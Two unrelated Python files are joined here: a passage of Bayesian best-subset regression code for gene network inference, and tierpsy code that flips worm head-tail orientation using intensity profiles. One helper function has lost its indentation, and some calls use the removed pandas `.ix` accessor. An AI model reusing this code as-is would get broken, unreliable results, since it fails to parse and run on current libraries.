    # expose the shared inputs through module globals for the per-gene wrapper
    global gx, gy, gpp, gwm, gns
    gx, gy, gpp, gwm, gns = X, Y, pp, weights_mat, nS
    # Here we illustrate splitting a simple loop, but the same approach
    # would work with any iterative control structure, as long as it is
    # deterministic.
    s = []
    limit = G
    for j in range(limit):
        if next(ownCheck):
            s.append(BBSRforOneGeneWrapper(j))
    # Report partial result.
    kvs.put('plist',(rank,s))
    # One participant gathers the partial results and generates the final
    # output.
    if 0 == rank:
        s=[]
        workers=int(os.environ['SLURM_NTASKS'])
        for p in range(workers):
            wrank,ps = kvs.get('plist')
            s.extend(ps)
        print ('final s', len(s))
        utils.kvsTearDown(kvs, rank)
        return s
    else:
        return None
def BBSRforOneGene(ind, X, Y, pp, weights_mat, nS):
    """Run best-subset regression for a single gene.

    Args:
        ind: row index of the gene in Y / pp / weights_mat.
        X: predictor (TF) expression matrix (TFs x conditions).
        Y: response expression matrix (genes x conditions).
        pp: boolean DataFrame of possible predictors per gene.
        weights_mat: Zellner g-prior weights per (gene, TF).
        nS: maximum number of predictors to keep.

    Returns:
        dict with the gene index, the final predictor mask, the fitted
        betas and the rescaled betas (per-predictor error reductions).
    """
    if ind % 100 == 0:
        print('Progress: computing BBSR for gene {}'.format(ind))
    pp_i = pp.ix[ind,].values  # boolean candidate-predictor mask (numpy array)
    pp_i_index = [l for l, j in enumerate(pp_i) if j]
    # no candidate predictors at all: return an all-zero model
    if sum(pp_i) == 0:
        return dict(ind=ind,pp=np.repeat(True, len(pp_i)).tolist(),betas=0, betas_resc=0)
    # create BestSubsetRegression input
    y = Y.ix[ind,:][:, np.newaxis]
    x = X.ix[pp_i_index,:].transpose().values  # converted to numpy array
    g = np.matrix(weights_mat.ix[ind,pp_i_index],dtype=np.float)
    # trim the candidate set down to at most nS predictors
    spp = ReduceNumberOfPredictors(y, x, g, nS)
    # NOTE(review): this masked in-place assignment assumes len(spp) equals
    # the number of True entries in pp_i — confirm; a mismatch would raise
    # or silently misalign the mask.
    pp_i[pp_i==True] = spp
    pp_i_index = [l for l, j in enumerate(pp_i) if j]
    x = X.ix[pp_i_index,:].transpose().values  # converted to numpy array
    g = np.matrix(weights_mat.ix[ind,pp_i_index],dtype=np.float)
    betas = BestSubsetRegression(y, x, g)
    betas_resc = PredictErrorReduction(y, x, betas)
    return (dict(ind=ind, pp=pp_i, betas=betas, betas_resc=betas_resc))
def ReduceNumberOfPredictors(y, x, g, n):
    """Pre-select at most *n* promising predictors for a gene.

    Scores every single-predictor and every predictor-pair model by its
    expected BIC and keeps the n predictors with the lowest accumulated
    score.

    Args:
        y: response vector (N x 1).
        x: design matrix (N x K).
        g: Zellner g-prior value(s).
        n: maximum number of predictors to keep.

    Returns:
        Boolean mask of length K marking the kept predictors (a plain
        list when no reduction was necessary).
    """
    num_preds = x.shape[1]
    # Nothing to trim: keep every available predictor.
    if num_preds <= n:
        return np.repeat(True, num_preds).tolist()
    # Candidate models: each single predictor plus every unordered pair.
    single_models = np.diag(np.repeat(True, num_preds))
    candidate_models = np.hstack((single_models, CombCols(num_preds)))
    model_bics = ExpBICforAllCombos(y, x, g, candidate_models)
    # Credit each predictor with the BIC of every model it appears in.
    per_pred_score = np.sum(
        np.multiply(candidate_models.transpose(), model_bics[:, np.newaxis]).transpose(), 1)
    per_pred_score = list(per_pred_score)
    keep = np.repeat(False, num_preds)
    keep[np.argsort(per_pred_score)[0:n]] = True
    return keep
def BestSubsetRegression(y, x, g):
    """Best subset regression over all 2^K predictor combinations.

    The selection criterion is the expected BIC under Bayesian regression
    with Zellner's g-prior.

    Args:
        y: dependent variable (N x 1).
        x: independent variables (N x K).
        g: value for Zellner's g-prior; scalar or vector.

    Returns:
        Coefficient vector of length K for the best model; entries for
        predictors excluded from that model are zero.
    """
    K = x.shape[1]
    combos = AllCombinations(K)
    bics = ExpBICforAllCombos(y, x, g, combos)
    # Column 0 of `combos` is the null model, so argmin == 0 means no
    # predictor combination beats the empty model.
    best = np.argmin(bics)
    betas = np.repeat(0.0, K)
    if best > 0:
        chosen = [col for col, flag in enumerate(combos[:, best]) if flag]
        x_best = x[:, chosen]
        # Solve the normal equations for the selected predictors only.
        bhat = np.linalg.solve(np.dot(x_best.transpose(), x_best),
                               np.dot(x_best.transpose(), y))
        for pos, col in enumerate(chosen):
            betas[col] = bhat[pos]
    return betas
def AllCombinations(k):
    """Boolean matrix of all subsets of *k* predictors.

    Returns a k x 2**k boolean array where each column is one subset; the
    first column is all False and corresponds to the null model.

    Raises:
        ValueError: if k < 1.
    """
    if k < 1:
        raise ValueError("No combinations for k < 1")
    subset_columns = itertools.product([False, True], repeat=k)
    return np.array(list(subset_columns)).transpose()
# Get all possible pairs of K predictors
def CombCols(K):
    """Boolean matrix enumerating all unordered pairs of K predictors.

    Args:
        K: total number of predictors.

    Returns:
        K x (K*(K-1)//2) boolean array; each column has exactly two True
        entries marking one pair, in itertools.combinations order.
    """
    # BUGFIX: use floor division — under Python 3, K*(K-1)/2 is a float and
    # np.full() rejects non-integer shapes.
    num_pair = K * (K - 1) // 2
    a = np.full((num_pair, K), False, dtype=bool)
    for i, pair in enumerate(itertools.combinations(range(K), 2)):
        a[i, list(pair)] = True
    return a.transpose()
def ExpBICforAllCombos(y, x, g, combos):
    """Expected BIC for every candidate predictor combination.

    For each combination of predictors, do Bayesian linear regression and
    compute the parametrization of the inverse-gamma distribution that
    underlies sigma squared, using Zellner's g-prior. Parameter g can be a
    vector. The expected value of log(sigma^2) is used to compute the
    expected BIC of each model.

    Args:
        y: response vector (N x 1).
        x: design matrix (N x K).
        g: Zellner g-prior value(s); scalar or 1 x K.
        combos: K x C boolean matrix; each column is one candidate model.

    Returns:
        numpy array with one expected BIC per model; np.inf for models
        whose normal equations are (numerically) singular.
    """
    K = x.shape[1]
    N = x.shape[0]
    C = combos.shape[1]
    # BUGFIX: dtype=float — the np.float alias was removed in NumPy 1.24.
    bics = np.array(np.repeat(0, C), dtype=float)
    # is the first combination the null model?
    first_combo = 0
    if sum(combos[:, 0]) == 0:
        # BIC of the null model reduces to the variance of y
        bics[0] = N * math.log(np.var(y, ddof=1))
        first_combo = 1
    # shape parameter of the inverse gamma that sigma^2 is drawn from
    shape = N / 2
    # compute digamma of shape here, so we can re-use it later
    dig_shape = special.digamma(shape)
    # pre-compute the dot products that we will need to solve for beta
    xtx = np.dot(x.transpose(), x)
    xty = np.dot(x.transpose(), y)
    # In Zellner's formulation there is a factor 1 / (g + 1) in the rate
    # parameter; here we replace it with the appropriate matrix since g is
    # a vector now.
    var_mult = np.array(np.repeat(np.sqrt(1 / (g + 1)), K, axis=0)).transpose()
    var_mult = np.multiply(var_mult, var_mult.transpose())
    for i in range(first_combo, C):
        comb = combos[:, i]
        comb = np.where(comb)[0]
        x_tmp = x[:, comb]
        k = len(comb)
        xtx_tmp = xtx[:, comb][comb, :]
        # if the xtx_tmp matrix is singular, set bic to infinity
        if np.linalg.matrix_rank(xtx_tmp, tol=1e-10) == xtx_tmp.shape[1]:
            var_mult_tmp = var_mult[:, comb][comb, :]
            # solving the normal equations directly is faster than calling lm
            bhat = np.linalg.solve(xtx_tmp, xty[comb])
            ssr = np.sum(np.power(np.subtract(y, np.dot(x_tmp, bhat)), 2))  # sum of squares of residuals
            # rate parameter of the inverse gamma; the prior guess for the
            # regression vector beta is all zeros (sparse models)
            rate = (ssr + np.dot((0 - bhat.transpose()), np.dot(np.multiply(xtx_tmp, var_mult_tmp), (0 - bhat.transpose()).transpose()))) / 2
            # expected value of log(sigma^2) from the rate/shape parametrization
            exp_log_sigma2 = math.log(rate) - dig_shape
            # expected value of BIC
            bics[i] = N * exp_log_sigma2 + k * math.log(N)
        # set bic to infinity if the system was singular
        else:
            bics[i] = np.inf
    return (bics)
def PredictErrorReduction(y, x, beta):
    """Per-predictor error reduction, measured by residual variance.

    Compares the full model against the model with each predictor left
    out in turn.

    Args:
        y: response vector (N x 1).
        x: design matrix (N x K).
        beta: fitted coefficients; zero entries mark inactive predictors.

    Returns:
        numpy array of length K with the error reduction of each
        predictor (zero for inactive ones).
    """
    n_preds = x.shape[1]
    active = [coef != 0 for coef in beta]
    active_idx = [idx for idx, flag in enumerate(active) if flag]
    n_active = sum(active)
    # sigma^2 of the full model
    full_residuals = np.subtract(y, np.dot(x, beta)[:, np.newaxis])
    sigma_sq_full = np.var(full_residuals, ddof=1)
    # this will be the output
    err_red = np.repeat(0.0, n_preds)
    # special case: a single predictor is compared against the null model
    if n_active == 1:
        err_red[active_idx] = 1 - (sigma_sq_full / np.var(y, ddof=1))
    # leave out each active predictor in turn and refit with the rest
    for i in active_idx[0:n_preds]:
        reduced = active[:]
        reduced[i] = False
        reduced_idx = [idx for idx, flag in enumerate(reduced) if flag]
        x_red = x[:, reduced_idx]
        bhat = np.linalg.solve(np.dot(x_red.transpose(), x_red),
                               np.dot(x_red.transpose(), y))
        residuals = np.subtract(y, np.dot(x_red, bhat))
        sigma_sq = np.var(residuals, ddof=1)
        err_red[i] = 1 - (sigma_sq_full / sigma_sq)
    return err_red
class BBSR_runner:
    """Driver object: builds the weights matrix from the priors, runs BBSR
    and reshapes the per-gene results into two DataFrames (betas and
    rescaled betas) indexed like the input matrices."""

    def run(self, X, Y, clr, prior_mat, kvs=None, rank=0, ownCheck=None):
        # number of predictors to keep per gene, and the prior weights
        n = 10
        no_prior_weight = 1
        prior_weight = 1  # prior weight has to be larger than 1 to have an effect
        weights_mat = prior_mat * 0 + no_prior_weight
        weights_mat = weights_mat.mask(prior_mat != 0, other=prior_weight)
        run_result = BBSR(X, Y, clr, n, no_prior_weight, weights_mat, prior_mat, kvs, rank, ownCheck)
        # non-root workers return no data (rank 0 gathered everything in BBSR)
        if rank:
            return (None,None)
        bs_betas = pd.DataFrame(np.zeros((Y.shape[0],prior_mat.shape[1])),index=Y.index,columns=prior_mat.columns)
        bs_betas_resc = bs_betas.copy(deep=True)
        # scatter each gene's betas back into the full genes x TFs frames
        for res in run_result:
            bs_betas.ix[res['ind'],X.index.values[res['pp']]] = res['betas']
            bs_betas_resc.ix[res['ind'],X.index.values[res['pp']]] = res['betas_resc']
        return (bs_betas, bs_betas_resc)
|
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 13 19:00:43 2016
@author: ajaver
"""
import collections
import os
import numpy as np
import pandas as pd
import tables
from scipy.ndimage.filters import median_filter, minimum_filter, maximum_filter
from tierpsy.analysis.int_ske_orient.checkFinalOrientation import checkFinalOrientation
from tierpsy.helper.params import head_tail_defaults, head_tail_int_defaults
from tierpsy.helper.misc import TimeCounter, print_flush
def medabsdev(x):
    """Median absolute deviation of *x*: median of |median(x) - x|."""
    deviations = np.abs(np.median(x) - x)
    return np.median(deviations)
def createBlocks(flags_vector, min_block_size=0):
    """Group runs of consecutive True flags into (start, end) index pairs.

    Args:
        flags_vector: iterable of booleans.
        min_block_size: runs spanning fewer than min_block_size + 1
            elements are discarded.

    Returns:
        List of inclusive (first_index, last_index) tuples.
    """
    starts = []
    ends = []
    previous = False
    last_index = -1
    for last_index, current in enumerate(flags_vector):
        if current and not previous:
            # rising edge: a new block begins here
            starts.append(last_index)
        elif previous and not current:
            # falling edge: the block ended on the previous element
            ends.append(last_index - 1)
        previous = current
    # close a block that was still open at the end of the vector
    if len(starts) == len(ends) + 1:
        ends.append(last_index)
    assert len(starts) == len(ends)
    blocks = list(zip(starts, ends))
    # drop blocks smaller than the requested minimum size
    return [block for block in blocks if block[1] - block[0] >= min_block_size]
def _fuseOverlapingGroups(corr_groups, gap_size=0):
'''Helper function of correctBlock.
-- gap_size, gap between blocks
'''
# ensure the groups are sorted
corr_groups = sorted(corr_groups)
if len(corr_groups) == 1:
return corr_groups
else:
# fuse groups that overlap
ini, fin = corr_groups[0]
corr_groups_f = [] # [(ini,fin)]
for gg in corr_groups[1:]:
if fin + gap_size >= gg[0]:
fin = gg[1]
else:
corr_groups_f.append((ini, fin))
ini, fin = gg
corr_groups_f.append((ini, fin))
return corr_groups_f
def correctBlock(groups, new_flag_vec, gap_size=0):
    """Grow each block outwards while the (unsmoothed) flags stay True,
    then fuse blocks that end up within gap_size of each other.

    Args:
        groups: list of inclusive (ini, fin) index pairs.
        new_flag_vec: boolean vector used to extend the block borders.
        gap_size: gap tolerated when fusing the grown blocks.

    Returns:
        List of corrected (ini, fin) pairs.
    """
    if len(groups) == 0:
        return groups  # nothing to do here
    grown = []
    last_valid = len(new_flag_vec) - 1
    for ini, fin in groups:
        # walk the start backwards over contiguous True flags
        while ini > 0 and new_flag_vec[ini - 1]:
            ini -= 1
        # walk the end forwards over contiguous True flags
        while fin < last_valid and new_flag_vec[fin + 1]:
            fin += 1
        grown.append((ini, fin))
    assert len(groups) == len(grown)
    return _fuseOverlapingGroups(grown, gap_size=gap_size)
def checkLocalVariation(worm_int_profile, groups, local_avg_win=10):
    """Keep only candidate blocks whose inverted intensity profile matches
    the neighbouring (non-candidate) frames better than the original one.

    Args:
        worm_int_profile: 2D array, one intensity profile per frame.
        groups: candidate (ini, fin) blocks to be inverted.
        local_avg_win: number of frames around each block used as the
            local reference.

    Returns:
        The subset of *groups* confirmed by the local comparison.
    """
    corr_groups = []
    groups = sorted(groups)
    tot_groups = len(groups)
    max_index = len(groups) - 1
    # require at least half a window of reference frames on a side
    min_loc_avg_win = max(1, local_avg_win // 2)
    for ii in range(tot_groups):
        gg = groups[ii]
        # get the limits from the previous and next groups (sentinels at
        # the vector borders)
        prev_group = (-1, -1) if ii == 0 else groups[ii - 1]
        next_group = (
            tot_groups,
            tot_groups) if ii == max_index else groups[
            ii + 1]
        # median profile of the candidate block
        med_block = np.median(worm_int_profile[gg[0]:gg[1] + 1], axis=0)
        m_dif_ori_left = 0
        m_dif_inv_left = 0
        m_dif_ori_right = 0
        m_dif_inv_right = 0
        # get previous contiguous map limits (clipped by the previous group)
        bot = max(gg[0] - local_avg_win, prev_group[1] + 1)
        top = gg[0] - 1
        if top - bot + 1 >= min_loc_avg_win:
            med_block_left = np.median(worm_int_profile[bot:top + 1], axis=0)
            m_dif_ori_left = np.sum(np.abs(med_block - med_block_left))
            m_dif_inv_left = np.sum(np.abs(med_block - med_block_left[::-1]))
        # get next contiguous map limits (clipped by the next group)
        bot = gg[1] + 1
        top = min(gg[1] + local_avg_win, next_group[0] - 1)
        if top - bot + 1 >= min_loc_avg_win:
            med_block_right = np.median(worm_int_profile[bot:top + 1], axis=0)
            m_dif_ori_right = np.sum(np.abs(med_block - med_block_right))
            m_dif_inv_right = np.sum(np.abs(med_block - med_block_right[::-1]))
        # accept the block only if the inverted profile matches both sides
        # at least as well as the original orientation
        if m_dif_inv_left <= m_dif_ori_left and m_dif_inv_right <= m_dif_ori_right:
            corr_groups.append(gg)
    return corr_groups
def removeBadSkelBlocks(
        groups,
        int_skeleton_id,
        trajectories_worm,
        min_frac_in,
        gap_size):
    """Snap candidate inversion blocks to runs of contiguous valid
    skeletons, discarding blocks that do not cover enough of a run.

    Args:
        groups: candidate (ini, fin) blocks, as row indexes into the
            intensity-profile array.
        int_skeleton_id: skeleton row id for each intensity profile.
        trajectories_worm: trajectory table rows for a single worm.
        min_frac_in: minimum fraction of a skeleton run that must fall
            inside a candidate block for the run to be switched.
        gap_size: gap tolerated when fusing skeleton runs.

    Returns:
        Corrected list of (ini, fin) blocks (intensity-profile indexes).
    """
    if len(groups) == 0:
        return groups  # nothing to do here
    # all rows must belong to a single worm trajectory
    assert trajectories_worm['worm_index_joined'].unique().size == 1
    # get the index of the skeletons that delimit the candidate blocks to
    # be inverted
    skel_group = [(int_skeleton_id[ini], int_skeleton_id[fin])
                  for ini, fin in groups]
    # change index in the original worm skeletons matrix
    first_skel = trajectories_worm.index[0]
    int_skel_group = [(x - first_skel, y - first_skel) for x, y in skel_group]
    # create blocks according to whether consecutive frames have a valid
    # (filtered) skeleton map
    good = (trajectories_worm['int_map_id'] != -1).values
    has_skel_group = createBlocks(good, min_block_size=0)
    # record the gap locations before fusing groups, otherwise we would
    # overestimate the size of the groups.
    # NOTE: plain bool/int builtins are used below; the np.bool and np.int
    # aliases were removed in NumPy 1.24.
    is_gap = np.full(len(trajectories_worm), True, bool)
    for kk, gg in enumerate(has_skel_group):
        is_gap[gg[0]:gg[1] + 1] = False
    # fuse skeleton blocks to be more stringent with the selection
    has_skel_group = _fuseOverlapingGroups(has_skel_group, gap_size=gap_size)
    # to test for overlaps, create a vector with the labeled groups
    has_blocks_flags = np.full(len(trajectories_worm), -1, int)
    for kk, gg in enumerate(has_skel_group):
        has_blocks_flags[gg[0]:gg[1] + 1] = kk
    # remove labels from the gaps
    has_blocks_flags[is_gap] = -1
    # total number of skeletons for each group
    blocks_sizes = collections.Counter(has_blocks_flags)
    # total number of skeletons of a given group inside a block to be switched
    blocks_in = []
    for gg in int_skel_group:
        blocks_in += list(has_blocks_flags[gg[0]:gg[1] + 1])
    blocks_in_size = collections.Counter(blocks_in)
    # calculate the fraction of skeletons of each group inside a block
    blocks_in_frac = {x: (blocks_in_size[x] / blocks_sizes[x])
                      for x in blocks_in_size if x != -1}
    # only keep groups that have at least min_frac_in of their skeletons
    # inside the block
    corr_skel_group = [has_skel_group[x]
                       for x in blocks_in_frac if blocks_in_frac[x] >= min_frac_in]
    # shift the index to match the general trajectories table
    corr_skel_group = [(x + first_skel, y + first_skel)
                       for x, y in corr_skel_group]
    # convert from skeleton row id back to rows in the worm intensity profiles
    int_map_ord = {dd: kk for kk, dd in enumerate(int_skeleton_id)}
    corr_groups = [(int_map_ord[x], int_map_ord[y])
                   for x, y in corr_skel_group]
    # fuse contiguous groups
    if len(corr_groups) > 1:
        corr_groups = _fuseOverlapingGroups(corr_groups, gap_size=1)
    return corr_groups
def dat_switch(X, r_range):
    """Reverse each row (head<->tail flip) of X over the inclusive row
    range r_range, in place."""
    stop = r_range[1] + 1
    block = X[r_range[0]:stop]
    X[r_range[0]:stop] = block[:, ::-1]
def dat_swap(X, Y, r_range):
    """Exchange the rows of X and Y over the inclusive row range r_range.

    Both blocks are read before either is written, matching the original
    statement order (the HDF5 nodes this is used on return copies when
    sliced)."""
    start, stop = r_range[0], r_range[1] + 1
    x_block = X[start:stop]
    y_block = Y[start:stop]
    X[start:stop] = y_block
    Y[start:stop] = x_block
def dat_switch_swap(X, Y, r_range):
    """Swap the row blocks of X and Y over the inclusive range r_range,
    reversing each row in the process (contour side1 <-> side2 exchange
    with a head<->tail flip).

    Statement order matches the original exactly: read both blocks, write
    X, then write Y."""
    start, stop = r_range[0], r_range[1] + 1
    x_block = X[start:stop]
    y_block = Y[start:stop]
    X[start:stop] = y_block[:, ::-1]
    Y[start:stop] = x_block[:, ::-1]
def switchBlocks(skel_group, skeletons_file, int_group, intensities_file):
    """Flip head<->tail data in place for the given blocks.

    Args:
        skel_group: (first, last) skeleton row ids of each block in the
            skeletons file.
        skeletons_file: HDF5 file with skeleton/contour nodes (opened r+).
        int_group: (first, last) row ids of each block in the intensities
            file.
        intensities_file: HDF5 file with straightened-worm intensity maps
            (opened r+).
    """
    with tables.File(skeletons_file, 'r+') as fid:
        contour_side1 = fid.get_node('/contour_side1')
        contour_side2 = fid.get_node('/contour_side2')
        skeleton = fid.get_node('/skeleton')
        contour_width = fid.get_node('/contour_width')
        #cnt1_length = fid.get_node('/contour_side1_length')
        #cnt2_length = fid.get_node('/contour_side2_length')
        # w_head_t = fid.get_node('/width_head_tip')
        # w_head_b = fid.get_node('/width_head_base')
        # w_neck = fid.get_node('/width_neck')
        # w_hips = fid.get_node('/width_hips')
        # w_tail_b = fid.get_node('/width_tail_base')
        # w_tail_t = fid.get_node('/width_tail_tip')
        for gg in skel_group:
            # sides swap AND each point sequence reverses when the head and
            # tail are exchanged
            dat_switch_swap(contour_side1, contour_side2, gg)
            dat_switch(skeleton, gg)
            dat_switch(contour_width, gg)
            #dat_swap(cnt1_length, cnt2_length, gg)
            #dat_swap(w_head_t, w_tail_t, gg)
            #dat_swap(w_head_b, w_tail_b, gg)
            #dat_swap(w_hips, w_neck, gg)
        fid.flush()
    with tables.File(intensities_file, 'r+') as fid:
        worm_int_med = fid.get_node('/straighten_worm_intensity_median')
        for gg in int_group:
            dat_switch(worm_int_med, gg)
        # the full intensity map is optional; flip both axes when present
        if '/straighten_worm_intensity' in fid:
            worm_int = fid.get_node('/straighten_worm_intensity')
            for ini, fin in int_group:
                dat = worm_int[ini:fin + 1, :, :]
                worm_int[ini:fin + 1, :, :] = dat[:, ::-1, ::-1]
        fid.flush()
def getDampFactor(length_resampling):
    """Taper weights that down-weight the head and tail of a profile,
    where segmentation errors or noise have the largest effect.

    Returns a vector of ones with a linear ramp (0.1 -> 1.0) over the
    first quarter and its mirror over the last quarter."""
    ramp_len = length_resampling // 4
    ramp = (np.arange(ramp_len) / (ramp_len - 1)) * 0.9 + 0.1
    damp_factor = np.ones(length_resampling)
    damp_factor[:ramp_len] = ramp
    damp_factor[-ramp_len:] = ramp[::-1]
    return damp_factor
def correctHeadTailIntWorm(
        trajectories_worm,
        skeletons_file,
        intensities_file,
        smooth_W=5,
        gap_size=0,
        min_block_size=10,
        local_avg_win=25,
        min_frac_in=0.85,
        method='MEDIAN_INT'):
    """Detect and correct head-tail switches for one worm using its
    intensity profiles.

    Args:
        trajectories_worm: trajectory table rows for a single worm.
        skeletons_file: HDF5 skeletons file (modified in place on switch).
        intensities_file: HDF5 intensities file (modified in place).
        smooth_W: window of the median/min/max smoothing filters.
        gap_size: gap tolerated when fusing candidate blocks.
        min_block_size: minimum number of intensity profiles required.
        local_avg_win: window for the local-variation confirmation step.
        min_frac_in: minimum fraction of a skeleton run inside a block.
        method: 'MEDIAN_INT' (default) or 'HEAD_BRIGHTER'.

    Returns:
        List of (first_frame, last_frame) tuples for the switched blocks;
        empty list when nothing was corrected.
    """
    # get data with valid intensity maps (worm int profile)
    good = trajectories_worm['int_map_id'] != -1
    int_map_id = trajectories_worm.loc[good, 'int_map_id'].values
    int_skeleton_id = trajectories_worm.loc[good, 'skeleton_id'].values
    int_frame_number = trajectories_worm.loc[good, 'frame_number'].values
    # only analyze data that contains at least min_block_size intensity
    # profiles
    if int_map_id.size == 0 or int_map_id.size < min_block_size:
        return []
    # read the worm intensity profiles
    with tables.File(intensities_file, 'r') as fid:
        worm_int_profile = fid.get_node(
            '/straighten_worm_intensity_median')[int_map_id, :]
    # normalize intensities of each individual profile
    worm_int_profile -= np.median(worm_int_profile, axis=1)[:, np.newaxis]
    # reduce the importance of the head and tail. These parts are typically
    # more noisy
    damp_factor = getDampFactor(worm_int_profile.shape[1])
    worm_int_profile *= damp_factor
    if method == 'HEAD_BRIGHTER':
        segmentIndex = worm_int_profile.shape[1]//5
        # builtin `float`: the np.float alias was removed in NumPy 1.24
        top_part = worm_int_profile[:,1:segmentIndex].astype(float)
        bot_part = worm_int_profile[:,-segmentIndex:].astype(float)
        # diff_inv should be high when the orientation is correct
        diff_inv = np.median(top_part, axis=1) - np.median(bot_part, axis=1)
        diff_ori = 0
    else:  # default method is 'MEDIAN_INT'
        # worm median intensity
        med_int = np.median(worm_int_profile, axis=0).astype(float)
        # total absolute difference between each profile and the median
        # profile using the original orientation ...
        diff_ori = np.sum(np.abs(med_int - worm_int_profile), axis=1)
        # ... and with the orientation inverted
        diff_inv = np.sum(np.abs(med_int[::-1] - worm_int_profile), axis=1)
    # smooth data, it is easier for identification
    diff_ori_med = median_filter(diff_ori, smooth_W)
    diff_inv_med = median_filter(diff_inv, smooth_W)
    # this will increase the distance between the original and the inversion.
    # Therefore it will become more stringent on detection
    diff_orim = minimum_filter(diff_ori_med, smooth_W)
    diff_invM = maximum_filter(diff_inv_med, smooth_W)
    # a segment with a bad head-tail identification should have a lower
    # difference with the median when the profile is inverted.
    bad_orientationM = diff_orim > diff_invM
    if np.all(bad_orientationM) and method != 'HEAD_BRIGHTER':
        return []
    # let's create blocks of skeletons with a bad orientation
    blocks2correct = createBlocks(bad_orientationM, min_block_size)
    # let's refine blocks limits using the original unsmoothed differences
    bad_orientation = diff_ori > diff_inv
    blocks2correct = correctBlock(blocks2correct, bad_orientation, gap_size=0)
    # let's correct the blocks inversion boundaries by checking that they do
    # not traverse a group of contiguous skeletons. I am assuming that head
    # tail errors only can occur when we miss a skeleton.
    blocks2correct = removeBadSkelBlocks(
        blocks2correct,
        int_skeleton_id,
        trajectories_worm,
        min_frac_in,
        gap_size=gap_size)
    # Check in the boundaries between blocks if there is really a better
    # local match if the block is inverted
    blocks2correct = checkLocalVariation(
        worm_int_profile, blocks2correct, local_avg_win)
    if not blocks2correct:
        return []
    # redefine the limits in the skeleton_file and intensity_file rows using
    # the final blocks boundaries
    skel_group = [(int_skeleton_id[ini], int_skeleton_id[fin])
                  for ini, fin in blocks2correct]
    int_group = [(int_map_id[ini], int_map_id[fin])
                 for ini, fin in blocks2correct]
    # finally switch all the data to correct for the wrong orientation in
    # each group
    switchBlocks(skel_group, skeletons_file, int_group, intensities_file)
    # store data from the groups that were switched
    switched_blocks = []
    for ini, fin in blocks2correct:
        switched_blocks.append((int_frame_number[ini], int_frame_number[fin]))
    return switched_blocks
def correctHeadTailIntensity(
        skeletons_file,
        intensities_file,
        smooth_W=5,
        gap_size=-1,
        min_block_size=-1,
        local_avg_win=-1,
        min_frac_in=0.85,
        head_tail_param=None,
        head_tail_int_method='MEDIAN_INT'):
    """Correct head-tail orientation for every worm in the results files
    using the straightened-worm intensity profiles.

    Negative smooth_W/gap_size/min_block_size/local_avg_win values are
    replaced by per-file defaults via head_tail_int_defaults(). The HDF5
    files are modified in place and the switched blocks are recorded under
    '/intensity_analysis'.
    """
    # avoid the mutable-default-argument pitfall: a shared {} default would
    # be reused across calls
    if head_tail_param is None:
        head_tail_param = {}
    output = head_tail_int_defaults(skeletons_file,
                                    smooth_W=smooth_W,
                                    gap_size=gap_size,
                                    min_block_size=min_block_size,
                                    local_avg_win=local_avg_win)
    smooth_W = output['smooth_W']
    gap_size = output['gap_size']
    min_block_size = output['min_block_size']
    local_avg_win = output['local_avg_win']
    head_tail_param = head_tail_defaults(skeletons_file, **head_tail_param)
    # get the trajectories table
    with pd.HDFStore(skeletons_file, 'r') as fid:
        trajectories_data = fid['/trajectories_data']
        # at this point the int_map_id with the intensity maps indexes must
        # exist in the table
        assert 'int_map_id' in trajectories_data
    grouped_trajectories = trajectories_data.groupby('worm_index_joined')
    tot_worms = len(grouped_trajectories)
    # variables to report progress
    base_name = skeletons_file.rpartition(
        '.')[0].rpartition(os.sep)[-1].rpartition('_')[0]
    progress_timer = TimeCounter('')
    bad_worms = []  # worms with not enough difference between the normal and inverted median intensity profile
    switched_blocks = []  # data from the blocks that were switched
    for index_n, (worm_index, trajectories_worm) in enumerate(
            grouped_trajectories):
        if index_n % 10 == 0:
            dd = " Correcting Head-Tail using intensity profiles. Worm %i of %i." % (
                index_n + 1, tot_worms)
            dd = base_name + dd + ' Total time:' + progress_timer.get_time_str()
            print_flush(dd)
        # correct head tail using the intensity profiles
        dd = correctHeadTailIntWorm(
            trajectories_worm,
            skeletons_file,
            intensities_file,
            smooth_W,
            gap_size,
            min_block_size,
            local_avg_win,
            min_frac_in,
            head_tail_int_method)
        switched_blocks += [(worm_index, t0, tf) for t0, tf in dd]
        # check that the final orientation is correct, otherwise switch the
        # whole trajectory
        if head_tail_int_method != 'HEAD_BRIGHTER':
            p_tot, skel_group, int_group = checkFinalOrientation(
                skeletons_file,
                intensities_file,
                trajectories_worm,
                min_block_size,
                head_tail_param)
            if p_tot < 0.5:
                switchBlocks(
                    skel_group,
                    skeletons_file,
                    int_group,
                    intensities_file)
    # label the process as finished and store the indexes of the switched worms
    with tables.File(skeletons_file, 'r+') as fid:
        if not '/intensity_analysis' in fid:
            fid.create_group('/', 'intensity_analysis')
        if '/intensity_analysis/bad_worms' in fid:
            # BUGFIX: remove the node that was actually checked above; the
            # old code tried to remove the non-existent path
            # '/intensity_analysis/min_block_size/bad_worms'.
            fid.remove_node('/intensity_analysis/bad_worms')
        if '/intensity_analysis/switched_head_tail' in fid:
            fid.remove_node('/intensity_analysis/switched_head_tail')
        if bad_worms:
            fid.create_array(
                '/intensity_analysis',
                'bad_worms',
                np.array(bad_worms))
        if switched_blocks:
            # to rec array (builtin int: the np.int alias was removed in
            # NumPy 1.24)
            switched_blocks = np.array(
                switched_blocks, dtype=[
                    ('worm_index', int), ('ini_frame', int), ('last_frame', int)])
            fid.create_table(
                '/intensity_analysis',
                'switched_head_tail',
                switched_blocks)
        fid.get_node('/skeleton')._v_attrs['has_finished'] = 4
    print_flush(
        base_name +
        ' Head-Tail correction using intensity profiles finished: ' +
        progress_timer.get_time_str())
    # return bad_worms, switched_blocks
if __name__ == '__main__':
    # Manual test driver: run the head-tail correction on one specific
    # experiment. Previously-used inputs kept for reference:
    #masked_image_file = '/Users/ajaver/Desktop/Videos/Avelino_17112015/MaskedVideos/CSTCTest_Ch1_18112015_075624.hdf5'
    #masked_image_file = '/Users/ajaver/Desktop/Videos/Avelino_17112015/MaskedVideos/CSTCTest_Ch1_17112015_205616.hdf5'
    #masked_image_file = '/Users/ajaver/Desktop/Videos/04-03-11/MaskedVideos/575 JU440 swimming_2011_03_04__13_16_37__8.hdf5'
    #masked_image_file = '/Users/ajaver/Desktop/Videos/04-03-11/MaskedVideos/575 JU440 on food Rz_2011_03_04__12_55_53__7.hdf5'
    masked_image_file = '/Volumes/behavgenom$/GeckoVideo/Curro/MaskedVideos/exp2/Pos2_Ch2_28012016_182629.hdf5'
    # derive the results-file names from the masked-video path
    skeletons_file = masked_image_file.replace('MaskedVideos', 'Results')[
        :-5] + '_skeletons.hdf5'
    intensities_file = skeletons_file.replace('_skeletons', '_intensities')
    correctHeadTailIntensity(
        skeletons_file,
        intensities_file,
